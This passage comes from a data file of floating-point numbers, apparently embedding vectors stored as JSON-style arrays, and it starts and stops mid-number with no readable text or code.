.006810168,-0.009665275,-0.001507574,-0.0059187906,-0.017700575,-0.03026587,-0.010691522,-0.023013728,-0.013573946,-0.013237018,0.017689973,-0.010685118,-0.017179227,0.031318907,-0.017726233,0.027721072,0.016920561,-0.009398809,0.0071702786,0.023701211,0.0068301014,0.020690013,-0.013052528,0.023520797,0.01693759,-0.048865225,-0.00009064052,0.005921525,-0.011208758,-0.005158822,0.012023146,-0.010413285,-0.018651797,-0.01019633,-0.017786533,0.0012240047,0.018202292,-0.02223806,0.017321525,0.031424277,0.0053490633,0.009162839,-0.0057974295,-0.014933569,0.019660085,0.017745895,0.006328457,-0.00380229,0.020355592,-0.0038998874,0.009623129,0.018364646,-0.034823604,-0.0130253555,-0.020347549,0.0017237866,-0.023762658,-0.017607642,0.0018654194,0.01357652,0.005101098,-0.019092457,-0.01979502,0.027370397,-0.020636458,0.00031411028,-0.006184609,0.024400825,-0.0075624636,-0.008317122,0.021294923,0.011038967,-0.0054340884,-0.0036873359,-0.027603893,-0.017461121,-0.008543316,0.0061982563,-0.008222755,0.00041452493,-0.013237479,0.0038670085,-0.011089531,0.011184168,-0.013394204,0.015027603,0.022122417,-0.0028058398,-0.009431385,0.01843607,-0.008411021,0.0107544465,-0.00067440746,0.009280998,-0.017872091,-0.005800015,0.021053085,0.015570092,0.004402936,-0.00022996918,0.0071126022,-0.029648865,0.012924299,0.011263501,0.008754624,-0.01103371,0.020585032,0.0025980086,-0.018152842,-0.023959035,0.017587617,-0.008307688,0.011175973,-0.0007328628,-0.0031391175,-0.0065579484,-0.00047759767,-0.009824577,0.08235111,-0.011438956,-0.0014384681,-0.0042722924,0.015207108,-0.022746312,0.018456072,0.010680623,-0.002727431,-0.012849817,-0.024642924,-0.019655358,-0.017641526,-0.006570144,0.013793794,-0.0051375497,0.0012167158,0.005212373,0.0038567022,0.017343119,0.008399665,0.0098332735,0.0033129004,0.0040245606,-0.006826093,0.0076625636,0.016318562,-0.01591946,0.0096190665,0.011150087,0.0073288777,-0.01542761,0.014151719,0.015573205,-0.0037115943,0.007588848,0.013737135,0.00021255632,-0.0146451825,0.00901938,0.0035256273,-0.013539722,0.021322591,0.0053125056,0.019000405,-0.022577785,-0.008881836,-0.024336433,-0.0049590063,-0.019506674,0.0091127455,-0.0027555856,-0.013770492,0.0041201822,-0.0094313985,0.021070555,0.0077317175,0.013343969,0.016228538,-0.014778362,0.015122282,0.0044896323,0.010536588,-0.017207019,-0.009603958,-0.002297765,-0.005853944,-0.015828826,0.01764608,-0.026003404,0.023019604,-0.015816601,0.017946806,0.018002165,0.002821558,-0.00059065653,0.016470011,-0.022174714,-0.02831756,-0.029177705,-0.013272166,0.008825885,0.02327502,0.0016457681,0.00026096054,0.0063965586,-0.020345792,0.0022098273,0.07746146,0.015678998,0.0132115735,0.0050902236,0.0072463797,0.033224873,0.01334588,0.025221992,0.0053071002,0.007004607,-0.01645232,0.025753003,0.007996049,-0.0052913125,0.028115992,-0.029071245,0.00931754,-0.005502234,-0.018111376,-0.013134433,0.008943247,0.031849228,0.024210753,0.011888923,0.0029647318,0.012504902,0.0057708747,-0.0013117739,0.0075272145,-0.009232141,-0.002917107,0.0103301965,0.02051922,-0.011153798,-0.010775138,-0.027990257,0.009105855,0.10691728,-0.0072783413,-0.0050833616,0.01593446,-0.00283661,0.013260526,-0.103599906,0.002403257,0.0115293125,0.0051438264,0.0055831256,-0.017899325,-0.015424957,0.016305916,0.0069581317,-0.025991855,-0.018798536,-0.0074295183,0.027948473,-0.014800776,-0.015065075,0.003601805,-0.010924244,0.011164277,-0.024828015,-0.0055743516,0.011919328,-0.009637276,-0.0045717913,-0.0078017325,-0.0043581035,-0.014033966,0.024299415,-0.010730676,-0.029081613,0.021262968,0.017804807,-0.0053008236,-0.014028934,-0.0146140745,0.017353628,0.021368546,-0.014099959,-0.02922079,-0.15266794,0.009808697,0.0224201,-0.03480053,0.010429091,-0.011470069,-0.001189842,-0.0014145831,0.017887624,-0.000029617067,-0.014797124,0.005089689,-0.01212941,0.0016143658,-0.0392586,-0.0009017093,0.00051677943,-0.0041527976,-0.008292076,0.014044367,0.01761652,-0.027233494,0.0017852314,-0.022577658,-0.027620343,0.013883479,-0.014997173,0.017472243,-0.007970037,-0.0062145395,-0.0021996296,-0.0007435332,-0.016829632,-0.0030214544,-0.0022954503,-0.023833087,-0.00049718784,-0.0027700688,-0.0065425877,0.025385797,-0.012155723,-0.00019759551,-0.002074527,0.0027363056,0.00022618636,0.030378764,0.0061497944,0.014165113,0.0040307506,0.015725117,0.030500652,0.013268424,-0.01075071,0.011684263,-0.01154461,0.020279758,-0.0063203163,-0.018879479,-0.0091296565,0.0015032205,-0.0021801672,-0.019537693,0.0051986785,-0.027015863,0.029713092,-0.0046722866,0.010570029,-0.02544087,-0.011429935,-0.013237845,-0.008220191,-0.0020324464,-0.0018479555,-0.015488139,0.024095263,0.010037214,0.009555565,0.006009676,0.011217568,-0.014616934,0.0013857351,-0.008610946,0.01322313,-0.051140156,0.010192528,0.0014427308,0.0031629088,0.003684604,-0.015444596,-0.022104712,0.020307003,-0.023598187,0.021808123,-0.010837722,0.0077602137,0.008770116,0.04451237,0.000012158115,-0.009802216,0.0002854452,0.0013267037,0.0031349186,-0.021941733,-0.001310881,-0.014260186,0.0051552374,0.015263774,-0.017229158,-0.0039580273,0.007821867,-0.0036512765,-0.026164595,0.02815095,0.002716772,-0.027545592,-0.006576414,-0.00012285003,0.0024300031,0.006605553,-0.0075476067,-0.024566945,0.020743964,-0.008288073,0.011657094,0.034790862,0.025060792,-0.026099682,-0.02027045,-0.0006289134,0.016308222,-0.033038463,0.004369998,-0.0071716555,0.001646253,-0.010859631,-0.0066959746,-0.029681062,0.015253228,-0.025525998,-0.0011998747,0.009855092,0.009561169,0.016066121,0.00068110734,0.021841805,-0.01573587,0.034789186,-0.0061381296,0.010501858,-0.006753181,0.010766387,0.033209693,-0.03337396,-0.026161026,0.01725463,0.047602758,-0.0013532877,-0.013953295,0.014256697,0.0048116203,0.0022505592,0.021142531,-0.011421751,-0.014071707,-0.010341711,-0.026946643,0.0091085695,-0.0012215385,0.0077660815,-0.010568001,0.016251208,0.011793399,0.027250241,0.006349693,0.005585625,0.025333835,-0.013424731,-0.0046502315,0.015128663,0.014674949,0.017342258,0.023864025,0.008987008,-0.0061976523,0.002288287,-0.021505065,-0.016346864,-0.005511051,0.009122554,0.014812333,-0.04375403,-0.031744987,0.0020554822,0.0026389454,-0.018556265,0.0051273685,0.03156843,0.0070201214,-0.02595574,0.0022805263,-0.022596536,-0.018896135,-0.005250545,0.003467395,-0.0016157866,0.008459372,0.0030133585,-0.0035397978,-0.018305738,0.0046697645,-0.0058496343,-0.018455287,-0.0010348819,0.0062369406,-0.003150683,0.009809025,-0.018952815,-0.022855869,-0.0031884282,0.0010917531,-0.007202322,-0.005109087,-0.0025073432,-0.008171055,0.022813912,-0.019585278,-0.0074715633,-0.036887623,-0.027531797,-0.0011625484,-0.0149227595,-0.012738795,-0.0023664404,0.003706579,0.02798463,0.011741345,0.02123659,0.0063021244,-0.008642487,0.0015983098,-0.03676015,-0.028276183,0.037856482,-0.028390924,0.0023977007,0.021519404,-0.00024556264,0.013120499,-0.009966241,0.017481303,0.023150323,0.012494455,0.004732339,0.022505313,-0.0099493945,0.002490493,0.01894844,-0.005038884,-0.015572958,-0.015362731,-0.02580212,-0.0054054954,0.017992534,0.013971044,-0.0067640594,0.0011656285,-0.02349782,0.017682683,-0.03232914,-0.003892164,0.04149571,-0.0049270955,0.020149209,0.025554204,-0.00622881,-0.024089422,0.015640091,0.015196862,-0.013955228,0.020995013,-0.024072846,0.009258003,-0.0067398045,-0.027277958,0.017860735,-0.009861927,0.03388979,0.004973669,-0.00019340537,-0.005158423,-0.0054180375,0.027296681,0.021127285,0.016458118,0.009374296,-0.032687865,-0.028720634,0.0047113756,-0.0016236743,-0.012205931,-0.0014233729,0.003883942,-0.007888429,-0.016820662,-0.005875294,-0.019338824,0.028298637,-0.0022987772,0.00849892,0.028383953,0.013719583,-0.009420793,-0.024875812,-0.0069825766,-0.0076153516,0.0150120575,0.030553032,0.0019742986,-0.0008453905,-0.028550377,0.029064115,0.045465022,-0.0025141921,0.032259867,0.0025736757,-0.0017043538,-0.004189561,0.0111966245,-0.0042777616,-0.00088312634,-0.015945876,-0.0051384703,0.014282355,-0.0140814,-0.018138923,-0.00063878944,0.016451662,0.005681304,-0.0070325066,0.000938981,0.009224506,0.005793997,0.0275245,-0.003059294,0.0037846607,0.0022582044,-0.009224895,-0.022828983,-0.008316013,-0.009673757,-0.006535072,0.017293883,-0.031774454,0.005416444,-0.0020632085,-0.00096904224,0.01171717,-0.016681071,-0.016787836,0.0061835283,-0.0097796675,0.0063261585,-0.036245137,0.009272786,-0.015245604,-0.022309229,0.004194271,-0.006413628,0.022738772,-0.02060737,-0.013082099,0.007205869,0.015852785,-0.004905644,-0.020858115,0.01046143,-0.004431267,0.012169264,-0.007933107,-0.0037420026,-0.007385511,-0.024215894,0.04857219,-0.012236453,-0.005664845,-0.007277845,0.017637698,0.00991567,-0.01743197,0.0058465637,-0.0130581325,-0.011549262,-0.0051316526,-0.02746803,-0.0052774586,-0.005060049,-0.035301644,-0.0146022495,0.023842476,-0.0014217299,-0.009392879,-0.016065812,0.0150289815,-0.009464307,0.028756479,0.0056959908,-0.0155883,-0.037575763,-0.013071439,-0.0025294453,-0.02729415,0.02641212,0.023688955,-0.013909781,-0.015737867,0.018285904,-0.02682154,0.006553195,-0.005997234,-0.007546235,-0.00090402574,0.01886851,0.043225322,-0.00063691224,0.005429336,0.0023304345,-0.0013187239,-0.02052264,-0.009158347,0.017278044,-0.020738354,0.00641453,-0.008547993,0.009326565,0.015043501,0.013232713,-0.024439998,0.0057631363,0.008638099,0.010122691,0.002404455,-0.0035084425,0.01604174,-0.008652739,-0.026289865,-0.015386326,0.016207384,0.010770845,-0.027873257,0.0030181494,-0.0070788576,-0.016553173,-0.014491613,0.0021914812,0.0054660044,0.0150549235,-0.00012809315,-0.002048672,0.0060544084,0.0048843687,0.0022779964,0.013061635,-0.0072664665,0.013650453,-0.005629016,-0.016829316,0.013291816,-0.0012276453,0.0011061776,0.01743222,-0.012549241,0.02512354,0.0440737,-0.0034655954,0.018135125,0.007258782,0.00067894027,0.0061002714,-0.017309157,-0.020571666,0.0203897,-0.020019544,-0.029864728,-0.0012587328,-0.010165732,-0.0028157858,-0.01733464,0.005410486,-0.103464894,0.017963948,-0.018132104,-0.031273194,-0.0068240575,-0.006580495,0.0017447222,0.025972815,0.00621628,-0.058671772,0.0037997651,0.039676756,0.01901677,-0.008601488,-0.0091694165,-0.0028102817,-0.017084291,-0.008947409,-0.008726512,0.013615027,0.029323606,-0.020026235,0.0036786883,-0.00503733,0.009241401,0.015726654,0.000377451,0.0098411655,0.01052751,0.01738442,-0.014979921,0.003421285,0.0063784434,0.01640896,0.004008557,0.0026583492,-0.01111973,0.0029330803,-0.0025273697,-0.004586815,0.00044496992,-0.009301892,0.005950827,0.011374437,0.007884609,0.0012257252,0.010385724,0.020015609,0.014062038,0.01925383,-0.00813059,0.012001724,0.007307821,-0.0038714043,-0.009210403,-0.0231217,0.0083350055,-0.0029613874,0.0014299215,0.002455714,-0.025387462,-0.0125310505,-0.0055454606,-0.013149812,0.0072233444,0.009002385,0.0018285504,0.005495749,-0.029818771,0.0033548875,-0.012992088,0.014138267,-0.005182681,0.009232444,0.003613076,0.005672314,0.0022773512,0.008650159,-0.019178992,0.020001616,-0.0360032,0.00019770498,0.004439409,0.041008912,-0.003864506,-0.03336751,0.00037132518,0.017501745,-0.011895568,0.017792586,0.010180282,-0.00848151,-0.0053886767,-0.022766337,-0.014406398,0.009615567,-0.014673216,0.009036638,-0.0033643611,0.00094728795,-0.01727659,0.010291166,-0.00024453245,-0.019080255,-0.1282705,-0.014711298,0.028689587,-0.018869199,0.0056982464,-0.0032649122,0.023265146,0.0037069803,0.030664077,0.023883177,-0.014403797,0.00915714,-0.02558674,-0.0025460585,-0.0019651514,0.0061091892,-0.0409789,0.013557697,-0.0053691426,-0.009001506,-0.012047791,-0.004148388,0.010135024,0.020246308,0.02015543,0.012103111,0.020001251,0.032969523,0.019145448,-0.0011228315,0.0015076976,-0.00009855426,-0.022882964,0.0085093,-0.039583422,-0.009600946,0.013354512,-0.018713646,0.00008059949,0.01757192,0.008905801,0.0042858995,0.009038317,0.020455599,0.006735401,-0.007092416,-0.00527749,0.013646451,-0.025866719,-0.010224326,0.0066294265,-0.012765203,-0.0011530621,-0.005833833,-0.009946829,0.0015280328,-0.0133909285,0.014585192,0.012196218,-0.0037977654,-0.004188239,0.01582576,-0.007416894,0.018213572,-0.0058145863,0.006627455,0.0018115393,0.008116756,0.0025087337,0.005760567,-0.009150599,0.03951208,0.0019333247,-0.017500766,0.029144634,0.023208654,0.007145241,0.02411629,-0.014310123,-0.002214316,0.011538364,-0.033670463,-0.0056978064,0.004861739,-0.030095628,0.01783004,-0.0012123514,-0.009294913,-0.019102124,-0.00714026,0.019042615,0.026864488,0.0033593297,0.031470858,0.014712503,0.015211102,0.06120961,-0.014748135,-0.013245608,-0.006147877,0.0025332076,0.000007640995,-0.011779283,-0.017816728,-0.030940324,0.026438082,0.0164434,0.0031446419,0.010082037,-0.011135359,0.009006401,0.031917192,-0.022318015,0.019952068,0.020450994,0.006933337,-0.013126015,-0.0024621242,-0.0130132055,0.0020491888,0.011659548,0.003042341,0.0061454605,-0.021080501,-0.0027904862,-0.024728933,-0.017562,0.022110684,0.0020951405,-0.0159915,-0.004137834,0.014796658,0.00023969017,-0.010376212,0.007921671,0.016789632,-0.01716092,-0.005817383,0.015038359,0.0035694602,-0.002881991,-0.0012219273,-0.0013917722,0.011013004,0.027102225,0.007946193,-0.020446751,-0.0011825284,-0.01820815,0.021051694,-0.006099098,0.0113189295,0.025844458,0.014492956,0.00041427775,0.0025831154,-0.0028078046,-0.0056379666,0.00037507873,0.015667904,0.006004707,0.02424908,0.023854239,0.0076100575,0.009274046,-0.008281376,-0.0060699466,0.005423424,0.009674544,0.005764992,-0.004262842,0.004395711,0.028359951,-0.06339891,0.013028805,0.008515227,0.01656749,0.0070527587,0.03495782,0.02387622,-0.019108616,0.0051468373,-0.006472939,-0.012562887,0.009602717,0.020810794,0.0016101556,-0.004553897,-0.013169208,-0.013371032,0.04130874,0.015578441,-0.00818737,-0.027577836,0.007151641,-0.008701803,-0.00021565949,0.018031333,0.0028794454,0.004589572,-0.032054696,0.0068329535,-0.0048029497,-0.0110968575,0.01744243,0.0039158706,0.0030685894,0.031613313,0.020401075,-0.014769058,-0.016497362,-0.0017458264,-0.014947945,-0.001764062,0.020355232,0.009465259,-0.013584168,-0.02834959,0.023427432,-0.00018598727,-0.023915093,-0.012938166,0.0030166488,0.004380468,-0.016598258,0.028501373,0.014493538,0.031048503,-0.019420693,-0.022366995,-0.0010154388,0.0038287714,-0.017561689,-0.0012355954,0.012549513,0.009451873,0.013374626,0.016752332,0.008821538,-0.0070212157,0.01548798,0.0031996414,0.023165649,0.017549558,0.022441205,0.0014030117,0.0032673106,0.0027048269,0.030814478,0.027065147,0.015142552,-0.006105953,-0.00846687,-0.0062721474,-0.0008951612,0.0059476364,0.015216994,0.002884324,-0.0108647905,0.016548645,-0.018497074,0.009406344,-0.015382712,-0.019628463,0.0009560497,-0.00039074075,0.0073758382,-0.014610897,-0.0067781596,-0.0041289884,0.02154836,0.010163192,-0.019704344,0.03203735,-0.009891046,-0.008786877,0.0145430025,0.00029158377,0.011849631,-0.008132329,0.008575886,-0.0049656685,-0.011169565,0.023311116,-0.007771966,0.0065681217,-0.001150515,0.019385183,-0.012011289,-0.014900143,0.015849845,-0.01198414,0.017505893,0.0020929445,0.012622966,0.011293458,0.012198528,-0.008013738,0.011790659,0.02580085,0.0049234643,-0.018585222,-0.021495802,-0.022281772,0.004939883,-0.0102062905,-0.003312355,0.022457045,0.0064174915,-0.0011850692,-0.027707575,0.021184044,-0.015242186,0.0060380357,0.009790644,0.0038344134,-0.0025917955,0.0010371312,-0.046213765,-0.010908401,-0.006705379,-0.022427086,0.016843531,-0.011165473,0.0073033003,0.016337048,0.017957948,0.029535402,-0.007609929,-0.013178218,0.026800795,-0.020096472,-0.001399788,-0.013879743,0.032687217,-0.011295363,0.011110567,0.04008595,-0.049171258,0.023084616,-0.009237433,0.013905821,0.0061492454,-0.0038448214,0.022642313,0.01914273,0.0042876806,-0.0031746663,-0.0072897794,0.017148087,-0.0052823015,-0.00020986989,-0.0037377295,-0.014219218,-0.0276934,0.029688999,-0.04026026,-0.0059978734,0.017562054,0.011179862,-0.02409668,0.0014523201,-0.0155462455,-0.0029409544,0.021963948,-0.002423033,-0.019096456,0.010871807,-0.027359668,-0.008180125,-0.014897198,0.01385979,-0.027734794,-0.016017606,-0.0067738458,-0.09089359,-0.0041650096,0.012615289,0.012524121,0.05544988,0.004190315,-0.016423825,-0.00011757565,-0.0145133305,0.00025676936,-0.00498034,-0.017223045,-0.016719166,0.021899229,0.042908024,-0.022240825,-0.01723503,-0.0065878555,0.00012561404,-0.03311329,-0.00058924494,0.00057865545,-0.012720802,0.0013803627,0.026172334,-0.008340357,-0.009307851,-0.0076506212,-0.008812884,-0.0069621704,-0.015687406,-0.008046264,-0.008595689,0.0011908403,-0.010558494,0.006550973,-0.0041762707,0.021563131,-0.036816794,-0.043509126,0.009228634,0.011135256,0.0035023922,0.005173291,-0.031629827,0.019061984,-0.034610715,-0.016312607,-0.010604704,0.008535567,-0.009386278,0.010062845,0.0051212497,0.03896099,0.0014931349,0.016097799,-0.0042646565,-0.025115432,0.023466032,0.003307251,-0.004894965,-0.0035942735,0.0031202682,0.014685938,0.002400624,0.013279819,0.002559887,0.018817646,0.0022919863,0.017617587,-0.010902229,-0.05185009,-0.014493419,-0.008624338,-0.011301013,0.00020834772,0.0037854612,0.0029075777,-0.0075201923,-0.0007579116,0.03052786,0.0007704354,0.01968345,0.01645254,0.0037092422,0.012892792,0.0006222441,0.00898282,0.022925694,-0.0012294615,-0.021279462,-0.0029583285,0.037697613,-0.0024866154,0.02498278,0.0053295405,-0.015172543,0.014130474,-0.028123308,0.00954689,-0.002521315,-0.010226215,-0.0012122837,-0.00095408247,-0.008417127,0.0041676383,-0.007125296,-0.008067866,-0.019840676,-0.022792945,-0.016861793,0.030091412,0.018709853,0.03549305,0.008827044,0.012404263,-0.013324789,0.01254639,-0.009704818,-0.037169926,-0.01961724,0.008406472,-0.0075628455,0.026425203,0.026786296,0.00901994,0.0049156495,0.01194544,-0.0129443025,0.0055380724,0.0057068197,0.0097507415,0.014635386,0.0023580643,-0.01976016,0.0016439712,0.016295597,0.02584924,0.013045044,0.01841193,0.0063150288,-0.017641973,-0.0030659314,-0.0067578116,-0.030094173,0.030718397,-0.007184667,-0.009381074,0.0059170146,-0.01984002,-0.009595804,0.017027041,0.0018440293,-0.0018364823,-0.006396505,0.007774457,-0.0014165487,-0.007055616,-0.01701633,-0.0012178788,0.004977581,0.015615109,-0.00218871,-0.00866788,-0.011123136,-0.0052489527,0.006032703,-0.0023809162,0.0019632317,0.0007132982,-0.008772114,-0.006043999,0.0038082649,-0.007538507,-0.015119043,-0.0065881046,0.020024344,0.015822496,-0.0037048561,-0.0008875403,-0.025109353,0.015439812,-0.0030160053,-0.018875485,0.008090647,-0.026228385,0.0014426251,0.008496471,0.01024027,0.00008784556,0.005694987,-0.016820313,-0.015461544,-0.028215019,-0.004265102,-0.032121792,0.0009853827,-0.00084699446,-0.023408955,0.00003991713,0.006718548,0.0071559474,-0.020674003,0.008165902,0.038221512,0.005861606,-0.0015215115,0.017789602,-0.020660013,-0.0014394929,-0.011527126,0.008448879,0.002804034,0.118756495,0.005100769,-0.024211377,0.00022262332,0.006039373,-0.0030446784,-0.0006533574,0.004577566,-0.0036445586,0.01627835,0.022448177,-0.016864814,0.014188172,-0.0007996766,-0.008446589,0.030293334,0.0062524616,-0.03192061,0.024332048,0.01008139,0.01647066,-0.013645044,-0.009314023,-0.041380156,-0.014347711,-0.06887383,0.030673964,0.028144851,0.0120079685,0.019777456,0.014710789,-0.019964794,0.014246827,-0.003938609,-0.014981864,0.012782066,0.010410484,-0.017419554,0.005725211,-0.022782806,0.0098104,-0.0025108329,-0.0067303902,-0.016862525,-0.021595793,-0.014200154,0.010261015,-0.0076715294,0.0012204896,-0.015947388,-0.00060281,-0.00087860285,0.0010876528,-0.020038763,0.009531664,-0.023152454,-0.00009620195,0.003777408,-0.0066375504,-0.007933787,0.007936663,0.0059366566,0.002570804,-0.0036337487,0.009190088,-0.0038075782,-0.011173385,0.0032625578,-0.0024574874,-0.016590683,0.021076728,-0.0032612816,0.002616653,-0.0045857383,-0.007205303,0.002985427,-0.007921438,-0.012452407,-0.0044308477,0.012427015,0.007593651,-0.009810512,0.01363809,-0.0020410456,0.00031372186,0.001099277,-0.015009775,0.0073693926,-0.0029456904,-0.009013023,0.0041729673,0.018071014,0.020707937,0.038535424,-0.019051686,-0.0036394815,0.004793254,0.0032390202,-0.021657716,0.0067908005,-0.0147540495,-0.015841722,0.0026764465,0.017859645,-0.008368858,-0.015547305,0.012003427,0.0063969544,-0.00806846,-0.0023657049,-0.006699901,0.025605038,0.010821782,0.007941486,0.012535206,0.009666124,-0.031228209,-0.0065922504,0.016528703,-0.021316722,-0.0036493707,0.025800077,0.009456499,0.044967704,0.019948049,-0.0016943825,-0.020709159,0.005189867,-0.00082105,-0.01541595,0.010972862,-0.034756295,0.009635711,0.029985365,-0.01072697,0.0025474234,0.032534447,-0.0008359093,0.019022467,-0.0004333011,-0.0024171362,-0.015735984,-0.010162776,0.0018271665,0.013912253,-0.009785555,0.018828612,-0.007742632,0.0020610897,-0.010337686,0.013600119,0.019258557,-0.022621106,0.006431601,-0.0007385801,-0.008912343,-0.016965628,0.004974853,-0.007583117,-0.011845313,0.0136298705,-0.011461855,0.005505091,-0.04583261,0.034013763,0.011425286,-0.0038655656,-0.0044919867,-0.025177144,0.0004258279,-0.024739549,-0.016034616,-0.003927615,-0.0005477418,-0.014022798,0.025550792,0.0014798943,0.004440947,-0.014397597,-0.0027739261,0.013041409,-0.00031043854,-0.012015407,-0.016312972,0.018381443,-0.0057070595,0.008792079,-0.00053516665,-0.024232347,0.033428278,0.013265117,-0.0018995064,0.00665525,0.018069781,-0.02048277,0.01785231,-0.021219831,0.03892775,-0.02158239,-0.030592114,-0.011052969,0.022007726,0.016160568,-0.018006204,0.0023427855,-0.013804386,-0.002820007,-0.021297418,0.0034720078,-0.015577819,0.015400215,0.003527337,-0.009556365,-0.027150357,0.015373886,-0.01134161,-0.015162369,-0.02910166,-0.028457684,0.0077018715,-0.018768964,-0.000026611864,0.012655368,0.015714461,0.005754107,0.0025611392,-0.024067007,0.0061507574,0.025114678,-0.03386679,-0.011323431,0.014561393,0.01655683,-0.0004108078,-0.032178268,-0.0047257813,0.028982617,0.009343735,0.008161449,0.017283602,-0.0027480742,-0.0003153564,0.02684529,0.005437436,0.014446651,0.012907406,-0.016083442,-0.009774677,-0.023075575,-0.011066201,-0.028953891,-0.0010286735,-0.0030771047,-0.019841105,-0.018652145,-0.024645677,-0.024804762,0.0017067385,0.016826399,-0.006505985,0.01023777,0.011167596,0.0059206584,0.013865546,-0.0051725633,0.0038189162,-0.00020035678,-0.02616563,-0.033142652,0.009862014,-0.002882322,0.010983305,-0.004809692,0.02122126,0.010621415,0.0055546463,0.00489504,0.007737429,-0.010300213,-0.011139903,0.0020590136,-0.0077773537,-0.014268655,-0.024257664,0.0040044477,-0.011583836,-0.009936806,0.019226322,0.080175646,-0.053077515,-0.014399523,0.026256546,0.012938655,-0.027486637,0.030042255,0.025605654,-0.01504155,-0.006878484,-0.00035957078,0.007822701,-0.001994192,-0.035634927,-0.0013760816,0.0032895685,0.0010391562,-0.012303937,0.0073650097,-0.008416348,-0.00748412,0.007827183,0.009695264,-0.00022551324,-0.0014171603,-0.002762263,0.006905994,-0.026625305,0.0050914474,-0.013033606,0.025328396,0.017643426,0.0040139896,-0.015193933,0.0024111117,0.02141761,-0.0017185316,0.02180062,-0.0027219767,-0.021216527,-0.01856354,-0.017151026,0.0029578526,0.0032346952,-0.0020265311,-0.011984538,-0.009554745,0.0105302455,-0.00040077895,0.13402899,-0.007455477,0.0050971513,0.014540325,-0.0012468385,-0.018761931,0.0047332463,0.027394434,0.01198335,0.0141413985,0.018571533,0.008833781,-0.0065851724,0.047694944,-0.005862367,-0.0067353873,0.0007680082,0.11958623,-0.01746883,0.02373016,-0.005150962,0.00055300375,0.008747031,0.010585745,0.016501967,-0.091033876,0.003437761,-0.035491075,-0.027640056,0.0083095385,-0.023212885,0.018716568,-0.007450981,-0.0023262592,-0.01260584,0.0042159813,-0.003946831,0.0017556964,-0.021153724,-0.005901105,0.016026843,-0.0008669287,-0.01807661,0.007176622,-0.020730464,0.012124422,-0.022473361,0.016810928,0.0023995435,0.012859744,0.0019654476,0.0015192475,0.034281224,0.0007757139,0.005187109,0.0060437513,0.007913338,-0.009814084,-0.03014067,0.022499695,-0.012221647,0.0025339066,-0.003377158,0.02028625,-0.004490416,-0.0076931883,-0.014362028,0.01596967,0.013054386,-0.001438328,0.019060401,0.013700898,-0.010704793,-0.0019893164,0.054458503,-0.014897848,-0.007809691,0.017432421,0.010330224,-0.0076495227,0.027763873,0.0032870048,-0.0134437,-0.009051159,0.023915805,0.003239284,-0.006800527,-0.0012899139,0.04132473,-0.018214466,-0.0037154977,0.013617053,-0.011846303,0.010056407,0.021363318,0.026028564,0.0122039765,0.010398778,0.0083333645,-0.027242485,-0.0019166995,0.021091055,-0.013090435,-0.0019411318,-0.015284668,0.021168863,-0.004498219,-0.025999725,0.0129288705,0.0044133905,0.016159195,0.016366674,-0.02204118,0.015998276,-0.0022297872,-0.0139149,-0.005108281,-0.009930903,-0.014660227,-0.0052748146,0.0033128206,-0.018584216,-0.0066839675,0.01992288,-0.010895832,0.018471008,0.010833635,0.020216128,-0.020687168,0.000510755,-0.015600846,-0.0050852164,-0.0021672498,0.07127507,-0.00078107003,-0.022368973,0.01458817,-0.027268562,-0.028940935,-0.0016905245,0.0014270012,0.017106056,0.009034564,-0.013112074,0.004530451,0.0073732478,0.01010776,0.007564844],[-0.016017145,-0.0034188544,-0.028111614,-0.014846783,0.0028886413,-0.0035984966,-0.003597568,0.025947936,-0.01372908,-0.010328197,0.010048383,0.012423256,-0.0068982416,-0.00024398131,-0.0008456519,0.012785289,0.017057842,0.007876018,0.005711166,-0.0051596803,0.004905262,-0.01105889,0.016696963,-0.021765223,0.0142768035,0.00053247245,-0.0005915529,0.0063571255,0.008268431,-0.0036322945,-0.00017159777,0.029359935,0.019053914,0.0059175394,0.004700858,-0.024917694,-0.005749777,-0.02205115,0.002339194,-0.009230717,-0.017162567,0.017474515,-0.008234203,0.022106916,-0.008114873,-0.0070990645,-0.00025598623,0.013160401,-0.015735457,0.010529389,-0.0049876585,0.0034076173,-0.013193827,0.010601956,-0.005404207,0.022034738,0.0011579315,-0.031289488,0.00030578393,-0.020915048,0.0074513704,0.0071905,-0.007915875,-0.018991427,0.017238403,-0.01960768,-0.010371006,-0.017251508,-0.0014474643,-0.024884043,-0.0001834116,-0.014097225,0.009580883,-0.0005870743,0.020725368,0.005402247,0.0005595677,-0.008104009,0.0011736491,0.027328389,-0.013056901,0.002865766,-0.006021796,-0.015950155,0.0049554477,-0.012703269,-0.020405537,-0.014954861,-0.0044452804,-0.021035483,-0.005665393,-0.005979308,0.0042856573,-0.0025223542,-0.018850014,0.024834925,0.011879643,-0.014513723,-0.012330159,0.016057605,-0.011504366,-0.00041263294,-0.049319815,0.01490566,0.0151737705,-0.015199098,-0.012198349,-0.003417854,-0.003618033,-0.009229296,-0.0057445597,0.013931407,0.0032005669,0.008370491,-0.015202032,-0.019098418,0.0070419395,0.013842463,-0.016153732,-0.0030768295,-0.008345427,0.009525347,0.0060014734,-0.00063658715,-0.008571182,-0.001614644,-0.011957202,0.014039098,0.00938511,-0.016789874,-0.011372556,0.00908272,-0.002974672,-0.007413069,0.00040831478,-0.0026117854,0.003544976,-0.0031864422,-0.012116717,-0.024916247,0.021341123,-0.013042371,0.007368317,0.003022711,0.008843393,0.019059159,-0.0039642463,0.033446398,0.012093961,-0.016134467,0.0034388034,0.011773664,0.010533335,-0.020756993,0.012775002,0.02509131,0.012672627,-0.012250752,-0.025636686,-0.008406548,-0.021497082,-0.005643345,0.010399446,-0.008791706,-0.016307825,-0.031358927,-0.01472338,-0.0050936453,-0.0035643233,0.01613398,-0.0057345647,0.015979853,0.012945354,0.0076135723,0.012428875,0.009944663,-0.017274616,-0.008648929,-0.0028365394,-0.0032514688,0.008162085,-0.009319556,-0.0029031674,0.002996263,0.0025382075,0.02639054,0.017422402,-0.028433044,-0.025717504,0.000105345316,0.006259305,-0.006493854,-0.0012554827,-0.005933681,-0.005182387,-0.015451884,-0.0005347846,0.09295725,-0.0018008107,0.006486758,-0.01664831,0.008569641,0.008363139,-0.034523305,-0.0036610016,-0.021133985,-0.014945085,-0.017631572,0.0060495557,-0.012593256,0.011362,0.0060670055,-0.006033615,0.021010729,0.018072326,-0.057913333,0.01721387,0.025104117,0.0078470325,0.012360771,-0.013985956,0.0073726317,0.0070722345,-0.022764804,-0.0024226313,-0.037162364,0.010728855,-0.00582808,0.014781451,-0.02075885,0.013483793,0.010246211,-0.024361622,-0.00255366,0.012992727,-0.01160799,-0.0035981098,-0.009432253,0.0008340512,-0.0077298214,-0.017191736,0.0051353765,0.023927514,0.025702145,-0.0027850433,0.013260641,0.03047732,0.010899121,-0.03353196,-0.0005613505,0.015127684,-0.01520427,0.009588108,0.028966969,-0.0056043323,-0.02095081,-0.01433952,-